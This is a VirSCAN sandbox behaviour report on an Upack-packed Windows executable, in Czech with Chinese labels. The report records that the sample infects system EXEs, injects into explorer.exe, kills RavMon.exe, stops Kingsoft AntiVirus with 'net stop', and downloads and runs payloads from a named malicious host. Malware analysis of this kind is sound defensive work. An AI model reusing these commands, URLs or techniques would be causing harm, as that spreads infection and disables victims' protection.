VirSCAN VirSCAN

1, Můžete nahrát libovolné soubory, ale existuje limit 20Mb na soubor.
2, VirSCAN podporuje dekompresi Rar / Zip, ale musí obsahovat méně než 20 souborů.
3, VirSCAN otestuje komprimované soubory, které jsou chráněné heslem 'infected' nebo 'virus'.

Vyberte jazyk
Zatížení serveru
Server Load

Informace o souboru
Bezpečnostní hodnocení:30
Seznam chování
Základní informace
MD5:4eb8a426191891cfccd4046a9d3b08f0
Typ souboru:EXE
Produkční společnost:
Verze:
Informace o Shell nebo kompilátoru:COMPILER:Upack 2.4 - 2.9 beta -> Dwing
Informace o podsouborech:upack0.32_380d0ba5dumpFile / 7fb01e25a2ef8c36147f91b09b5a5b3d / EXE
klíčová opatření
Popis chování:修改原系统的EXE文件
Podrobnosti:C:\WINDOWS\hh.exe---> Offset = 958
C:\WINDOWS\NOTEPAD.EXE---> Offset = 0
C:\WINDOWS\regedit.exe---> Offset = 0
C:\WINDOWS\TASKMAN.EXE---> Offset = 0
C:\WINDOWS\twunk_32.exe---> Offset = 0
C:\WINDOWS\winhlp32.exe---> Offset = 0
C:\WINDOWS\$NtUninstallKB2412687$\spuninst\spuninst.exe---> Offset = 958
C:\WINDOWS\assembly\GAC_MSIL\PresentationFontCache\3.0.0.0__31bf3856ad364e35\PresentationFontCache.exe---> Offset = 4096
Popis chování:跨进程写入数据
Podrobnosti:TargetProcess = explorer.exe, WriteAddress = 0x03010000, Size = 20
C:\WINDOWS\explorer.exe
TargetProcess = explorer.exe, WriteAddress = 0x02890000, Size = 40
Popis chování:设置线程上下文
Podrobnosti:C:\WINDOWS\explorer.exe
Popis chování:杀掉进程
Podrobnosti:RavMon.exe
Chování procesu
Popis chování:跨进程写入数据
Podrobnosti:TargetProcess = explorer.exe, WriteAddress = 0x03010000, Size = 20
C:\WINDOWS\explorer.exe
TargetProcess = explorer.exe, WriteAddress = 0x02890000, Size = 40
Popis chování:创建进程
Podrobnosti:ImagePath = C:\WINDOWS\system32\net.exe, CmdLine = net stop "Kingsoft AntiVirus Service"
ImagePath = C:\WINDOWS\system32\net1.exe, CmdLine = net1 stop "Kingsoft AntiVirus Service"
Popis chování:设置线程上下文
Podrobnosti:C:\WINDOWS\explorer.exe
Popis chování:枚举进程
Podrobnosti:N/A
Popis chování:杀掉进程
Podrobnosti:RavMon.exe
Popis chování:创建下载文件进程
Podrobnosti:ImagePath = C:\WINDOWS\0Sy.exe, CmdLine = C:\WINDOWS\0Sy.exe
ImagePath = C:\WINDOWS\1Sy.exe, CmdLine = C:\WINDOWS\1Sy.exe
ImagePath = C:\WINDOWS\2Sy.exe, CmdLine = C:\WINDOWS\2Sy.exe
Chování souborů
Popis chování:写权限映射文件
Podrobnosti:CiceroSharedMemDefaultS-1-5-21-1482476501-1645522239-1417001333-500
MSCTF.MarshalInterface.FileMap.IAK..BFEIEB
MSCTF.MarshalInterface.FileMap.IAK.B.BFEIEB
MSCTF.MarshalInterface.FileMap.IAK.C.BFEIEB
MSCTF.MarshalInterface.FileMap.IAK.D.BFEIEB
MSCTF.MarshalInterface.FileMap.IAK.E.BFEIEB
MSCTF.MarshalInterface.FileMap.IAK.F.BGEIEB
MSCTF.MarshalInterface.FileMap.IAK.G.BGEIEB
MSCTF.MarshalInterface.FileMap.EO.JN.BGEIEB
MSCTF.MarshalInterface.FileMap.EO.KN.BGEIEB
MSCTF.MarshalInterface.FileMap.EO.LN.BGEIEB
MSCTF.MarshalInterface.FileMap.ENK..HPFIEB
MSCTF.MarshalInterface.FileMap.ENK.B.HPFIEB
MSCTF.MarshalInterface.FileMap.ENK.C.HPFIEB
MSCTF.MarshalInterface.FileMap.ENK.D.HPFIEB
Popis chování:修改原系统的EXE文件
Podrobnosti:C:\WINDOWS\hh.exe---> Offset = 958
C:\WINDOWS\NOTEPAD.EXE---> Offset = 0
C:\WINDOWS\regedit.exe---> Offset = 0
C:\WINDOWS\TASKMAN.EXE---> Offset = 0
C:\WINDOWS\twunk_32.exe---> Offset = 0
C:\WINDOWS\winhlp32.exe---> Offset = 0
C:\WINDOWS\$NtUninstallKB2412687$\spuninst\spuninst.exe---> Offset = 958
C:\WINDOWS\assembly\GAC_MSIL\PresentationFontCache\3.0.0.0__31bf3856ad364e35\PresentationFontCache.exe---> Offset = 4096
Popis chování:创建可执行文件
Podrobnosti:C:\WINDOWS\rundl132.exe
C:\WINDOWS\twunk_16.exe
C:\WINDOWS\winhelp.exe
C:\monitor\vDll.dll
Popis chování:修改文件内容
Podrobnosti:C:\WINDOWS\_desktop.ini---> Offset = 0
C:\WINDOWS\$NtUninstallKB2412687$\_desktop.ini---> Offset = 0
C:\WINDOWS\$NtUninstallKB2412687$\spuninst\_desktop.ini---> Offset = 0
C:\WINDOWS\addins\_desktop.ini---> Offset = 0
C:\WINDOWS\AppPatch\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\CustomMarshalers\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\ISymWrapper\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\mscorlib\_desktop.ini---> Offset = 0
C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\_desktop.ini---> Offset = 0
Popis chování:修改原系统的可执行文件
Podrobnosti:C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\ComSvcConfig\19b50dd470540911fc5cc65331a769e4\ComSvcConfig.ni.exe---> Offset = 90112
C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\dfsvc\a2865dcec9c5d3cc9c55f026cbad6fcc\dfsvc.ni.exe---> Offset = 0
C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\MSBuild\87c84ffaaad81d8d106a9aa9d68b5926\MSBuild.ni.exe---> Offset = 4096
C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationFontCac#\9469981a17c01dd154c540127e678b35\PresentationFontCache.ni.exe---> Offset = 4096
C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\ServiceModelReg\6781b87c8d3b55e6120b1e86bea6e040\ServiceModelReg.ni.exe---> Offset = 90112
C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\SMSvcHost\b9c1a29e684bc02e49226ff1e9eec253\SMSvcHost.ni.exe---> Offset = 90112
Chování sítě
Popis chování:枚举网络共享资源
Podrobnosti:N/A
Popis chování:下载文件
Podrobnosti:URLDownloadToFileW: http://www.17dk.com/gua/zt.txt ---> c:\1.txt
C:\1.txt
URLDownloadToFileW: http://www.17dk.com/gua/zt.exe ---> C:\WINDOWS\0Sy.exe
C:\WINDOWS\0Sy.exe
URLDownloadToFileW: http://www.17dk.com/gua/wow.txt ---> c:\1.txt
URLDownloadToFileW: http://www.17dk.com/gua/wow.exe ---> C:\WINDOWS\1Sy.exe
C:\WINDOWS\1Sy.exe
URLDownloadToFileW: http://www.17dk.com/gua/mx.txt ---> c:\1.txt
URLDownloadToFileW: http://www.17dk.com/gua/mx.exe ---> C:\WINDOWS\2Sy.exe
C:\WINDOWS\2Sy.exe
Chování registru
Popis chování:修改注册表
Podrobnosti:\REGISTRY\USER\S-1-5-21-1482476501-1645522239-1417001333-500\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
\REGISTRY\MACHINE\SOFTWARE\Soft\DownloadWWW\auto
\REGISTRY\USER\S-1-5-21-1482476501-1645522239-1417001333-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\0Sy.exe
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down0
\REGISTRY\USER\S-1-5-21-1482476501-1645522239-1417001333-500\SessionInformation\ProgramCount
\REGISTRY\USER\S-1-5-21-1482476501-1645522239-1417001333-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\1Sy.exe
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down1
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\ver_down2
\REGISTRY\USER\S-1-5-21-1482476501-1645522239-1417001333-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\2Sy.exe
Popis chování:删除注册表键值
Podrobnosti:\REGISTRY\MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW\DWFileTreeRoot
Popis chování:删除注册表键
Podrobnosti:\REGISTRY\MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW
Další chování
Popis chování:查找指定窗口
Podrobnosti:NtUserFindWindowEx: [Class,Window] = [RavMonClass,RavMon.exe]
NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
Popis chování:创建互斥体
Podrobnosti:SHIMLIB_LOG_MUTEX
CTF.LBES.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.Compart.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.Asm.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.TMD.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1645522239-1417001333-500MUTEX.DefaultS-1-5-21-1482476501-1645522239-1417001333-500
MSCTF.Shared.MUTEX.EO
MSCTF.Shared.MUTEX.IAK
MSCTF.Shared.MUTEX.ELL
MSCTF.Shared.MUTEX.ENK
Popis chování:枚举窗口
Podrobnosti:N/A
Abnormální havárie
Popis chování:查找指定窗口
Podrobnosti:NtUserFindWindowEx: [Class,Window] = [RavMonClass,RavMon.exe]
NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
Popis chování:创建互斥体
Podrobnosti:SHIMLIB_LOG_MUTEX
CTF.LBES.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.Compart.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.Asm.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.TMD.MutexDefaultS-1-5-21-1482476501-1645522239-1417001333-500
CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1645522239-1417001333-500MUTEX.DefaultS-1-5-21-1482476501-1645522239-1417001333-500
MSCTF.Shared.MUTEX.EO
MSCTF.Shared.MUTEX.IAK
MSCTF.Shared.MUTEX.ELL
MSCTF.Shared.MUTEX.ENK
Popis chování:枚举窗口
Podrobnosti:N/A
Spustit snímek obrazovky
VirSCAN

O VirSCAN | Ochrana soukromí | Kontakt | Přátelský odkaz | Pomozte VirSCAN
Překlad strongy
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号